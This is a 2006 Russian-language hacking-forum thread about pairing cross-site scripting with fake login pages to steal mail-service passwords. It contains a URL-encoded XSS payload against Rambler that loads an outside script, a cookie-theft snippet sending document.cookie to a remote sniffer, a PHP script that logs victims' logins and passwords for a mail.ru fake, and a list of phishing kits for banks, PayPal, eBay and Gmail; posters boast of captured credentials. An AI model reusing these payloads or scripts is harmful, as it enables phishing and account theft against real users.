HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS + Feik
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

XSS + Feik
  #1  
Старый 16.11.2006, 14:37
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами: 10267526

Репутация: 40
По умолчанию XSS + Feik
Feik - старая пассивная атака, метод подмена странички с формой авторизации.

ВОтсь...почему то на этом форуме про фреки не видел. а тем более про их сочетание.
Вы даёте ссылку жертве а она авторизируеться и её куда нить перекидывают а пароль и лог записываем.
это если смещиват с пассивной XSS

А если с активной получаеться весьма неплохо реализовать какую нибудь XSS ...зловредным срипторм сделать форму авторизации...чел псевдо-авторизируеться и перекидываем на что нить такое типа анкеты...чтоб без подозрений.

Особенно я думмаю феки актуальны на ресурсах на которых жизнь сессии кукисов очень мала. Или проверка кукисов по айпи и т.п.

Примером для такого ресурса стал рамблер кукисы которого перехватить очень сложно т.к. они умерают через кророткое время.
Итак представляем фейк с пассивной XSS на рамблере.
Да и XSS найденна не мной её кто-то тут выкладывал...непомню автора.

http://guap-spb.jino-net.ru/log01.txt
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось __XT__; 16.11.2006 в 14:41..
 
Ответить с цитированием

  #2  
Старый 16.11.2006, 17:52
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....
Цитата:
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
Последний раз редактировалось slider; 16.11.2006 в 17:56..
 
Ответить с цитированием

  #3  
Старый 16.11.2006, 20:52
__XT__
Познающий
Регистрация: 07.11.2006
Сообщений: 30
С нами: 10267526

Репутация: 40
По умолчанию
Цитата:
Сообщение от slider  
Согласен штука занимательная....

Но всё же лучше сделать редирект не на форму с подменой а на сниффер

К примеру....


формочку подобную легко накатать на php, сам такой штукой увлекалсо...
Главное что работает....
Человека перекидывает к примеру на главную страничку вашего сайта и там вбивает логин и пароль.... и его опять перекидывает на сайт где он и должен был бы быть....
А тем временем значения пароля и логина которые он вбил сохраняютя...
да так и есть всё как ты описал-)


"Но всё же лучше сделать редирект не на форму с подменой а на сниффер"
С этим несогласен:
1) не какого редиректа нет...посматрел бы хоть 1.js
2)я же писал выше что феик для сайтов где время жизни сессия приписано данной странички и ли вообще очень мало...т.е. перехватывать кукисы бессмывсленно.
а ты пишешь -
<script>navigate('http://antichat.ru/снифф/s.gif?'.concat(document.cookie))</script>
2-й минус - идут кукисы а не пароль.

А в данном фреике всё путём - конечно расичтано на неопытного юзера который не будет глядеть в титле
и дэкодировать урл-)
однако ~70% сразу авторизируються и пароль и логин у меня в логе.





===================================


Ещё ращ кто не понял как юзать:
даём жертве чей ящик на рамблере - урл:

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

там наша форма авторизации с левым <form action=

дальше как жертва авторизировалась её пароль и логин записываеться здесь:

http://guap-spb.jino-net.ru/log01.txt
 
Ответить с цитированием

  #4  
Старый 16.11.2006, 21:44
f0xyL
Познающий
Регистрация: 18.02.2006
Сообщений: 64
С нами: 10644664

Репутация: 8
По умолчанию
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>
 
Ответить с цитированием

  #5  
Старый 26.11.2006, 15:43
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
С нами: 10885346

Репутация: 2947


По умолчанию
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
 
Ответить с цитированием

  #6  
Старый 26.11.2006, 15:50
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
Небольшая коллекция фэйков

http://someshit.net/showthread.php?t=52

Цитата:
BankofAmerica2006.zip
Barclays06.zip
Chase.zip
DEUTCH BANK.rar
Ebay2006.zip
EGold.zip
Epass.zip
Gmail.rar
Isra-test.zip
Kentbnk.zip
Mail_yandex.rar
Paypal06.zip
Paypal-Customers-Scam.rar
POST BANK.rar
eBay.com.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
Последний раз редактировалось blackybr; 26.11.2006 в 15:59..
 
Ответить с цитированием

  #7  
Старый 26.11.2006, 15:58
cheet
Banned
Регистрация: 22.09.2006
Сообщений: 107
С нами: 10333906

Репутация: -10
По умолчанию
Цитата:
Сообщение от slider  
Кстать на Ipb 2.1.7 Фейк мутнул .. офигенно прокатил...
Потом скину темку =)

Или видео сниму )
давай выыкладывай охото посмотреть
 
Ответить с цитированием

  #8  
Старый 26.11.2006, 16:14
cheet
Banned
Регистрация: 22.09.2006
Сообщений: 107
С нами: 10333906

Репутация: -10
По умолчанию
Цитата:
Сообщение от f0xyL  
Вот скрипт для фейка маил ру


<?php

error_reporting(0);

$log = "log.txt";

$today = getdate();
$month = $today[month];
$mday = $today[mday];
$year = $today[year];
$current_date = $mday . " " . $month . " " . $year;

$fp = fopen($log, "a");
$line = $REMOTE_ADDR . " | " . $current_date . " | " . $login . " | " . $domen . " | " . $pass . "\n";
$size = strlen($line);
fputs($fp, $line, $size);
fclose($fp);

header("Location: http://win.mail.ru/cgi-bin/auth");

?>
что то он не катит
 
Ответить с цитированием

  #9  
Старый 29.11.2006, 17:15
-voevoda-
Новичок
Регистрация: 29.11.2006
Сообщений: 4
С нами: 10236385

Репутация: 4
По умолчанию
да фишка конечно класно
только вопрос возник ссылку нужно делать только на явасскрипт или на Php тожоже пойдет?
просто сам попробовал на Php ссылку дать нехрена не получаеться...
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.